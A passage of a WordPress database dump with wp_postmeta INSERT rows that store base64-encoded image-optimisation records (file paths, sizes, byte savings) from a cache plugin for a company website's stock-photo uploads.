b2NrXzYwODQ4NjY4LTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja182MDg0ODY2OC0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzYwODQ4NjY4LTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODEwMTMsImlkIjo4Mzh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzYwODQ4NjY4LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzYwODQ4NjY4LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzYwODQ4NjY4LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgxMDE2LCJpZCI6ODM4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja182MDg0ODY2OC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja182MDg0ODY2OC0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja182MDg0ODY2OC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4MTAxOCwiaWQiOjgzOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjA4NDg2NjgtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjA4NDg2NjgtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjA4NDg2NjgtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODEwMjEsImlkIjo4Mzh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzYwODQ4NjY4LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzYwODQ4NjY4LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzYwODQ4NjY4LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgxMDI0LCJpZCI6ODM4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzYwODQ4NjY4LTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzYwODQ4NjY4LTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzYwODQ4NjY4LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgxMDI2LCJpZCI6ODM4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzYwODQ4NjY4LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzYwODQ4NjY4LTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzYwODQ4NjY4LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgxMDI5LCJpZCI6ODM4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzYwODQ4NjY4LTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzYwODQ4NjY4LTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzYwODQ4NjY4LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgxMDMxLCJpZCI6ODM4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzYwODQ4NjY4LTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzYwODQ4NjY4LTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzYwODQ4NjY4LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgxMDM0LCJpZCI6ODM4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzYwODQ4NjY4LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzYwODQ4NjY4LTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzYwODQ4NjY4LTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgxMDM2LCJpZCI6ODM4fV0='); 
INSERT INTO `wp_postmeta` VALUES (29944, 836, 'wpfc_optimisation_reduction', '10871'); 
INSERT INTO `wp_postmeta` VALUES (29945, 836, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQxNjM1MjMwNy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MTYzNTIzMDcuanBnIiwid2lkdGgiOjU0NzIsImhlaWdodCI6MzY0OCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4MTA0MSwiaWQiOiI4MzYifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MTYzNTIzMDctMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDE2MzUyMzA3LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQxNjM1MjMwNy0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NTA0LCJ0aW1lIjoxNDgzNTgxMDQ1LCJpZCI6ODM2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MTYzNTIzMDctODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDE2MzUyMzA3LTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQxNjM1MjMwNy04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6ODg5LCJ0aW1lIjoxNDgzNTgxMDQ5LCJpZCI6ODM2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MTYzNTIzMDctNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDE2MzUyMzA3LTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQxNjM1MjMwNy03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6NzYyLCJ0aW1lIjoxNDgzNTgxMDUzLCJpZCI6ODM2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MTYzNTIzMDctMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQxNjM1MjMwNy0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQxNjM1MjMwNy0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjozOTM0LCJ0aW1lIjoxNDgzNTgxMDU3LCJpZCI6ODM2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MTYzNTIzMDctMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDE2MzUyMzA3LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQxNjM1MjMwNy0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NDgyLCJ0aW1lIjoxNDgzNTgxMDYxLCJpZCI6ODM2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MTYzNTIzMDctMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDE2MzUyMzA3LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQxNjM1MjMwNy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDA2LCJ0aW1lIjoxNDgzNTgxMDY0LCJpZCI6ODM2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MTYzNTIzMDctMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDE2MzUyMzA3LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQxNjM1MjMwNy0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NDE1LCJ0aW1lIjoxNDgzNTgxMDY3LCJpZCI6ODM2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MTYzNTIzMDctNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDE2MzUyMzA3LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQxNjM1MjMwNy01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6NzM4LCJ0aW1lIjoxNDgzNTgxMDcxLCJpZCI6ODM2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQxNjM1MjMwNy0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MTYzNTIzMDctMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDE2MzUyMzA3LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo0NTAsInRpbWUiOjE0ODM1ODEwNzQsImlkIjo4MzZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDE2MzUyMzA3LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQxNjM1MjMwNy0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MTYzNTIzMDctMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjUwMCwidGltZSI6MTQ4MzU4MTA3OCwiaWQiOjgzNn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MTYzNTIzMDctMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDE2MzUyMzA3LTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQxNjM1MjMwNy0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NTU1LCJ0aW1lIjoxNDgzNTgxMDgxLCJpZCI6ODM2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQxNjM1MjMwNy0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MTYzNTIzMDctMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDE2MzUyMzA3LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo1ODYsInRpbWUiOjE0ODM1ODEwODUsImlkIjo4MzZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDE2MzUyMzA3LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQxNjM1MjMwNy00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MTYzNTIzMDctNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjY1MCwidGltZSI6MTQ4MzU4MTA4OSwiaWQiOjgzNn1d'); 
INSERT INTO `wp_postmeta` VALUES (29946, 834, 'wpfc_optimisation_reduction', '14792'); 
INSERT INTO `wp_postmeta` VALUES (29947, 834, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NTYwMzU4Mi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODU2MDM1ODIuanBnIiwid2lkdGgiOjM3NTAsImhlaWdodCI6MjUwMCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4MTA5MywiaWQiOiI4MzQifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODU2MDM1ODItMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg1NjAzNTgyLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NTYwMzU4Mi0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NzE5LCJ0aW1lIjoxNDgzNTgxMDk3LCJpZCI6ODM0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODU2MDM1ODItODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg1NjAzNTgy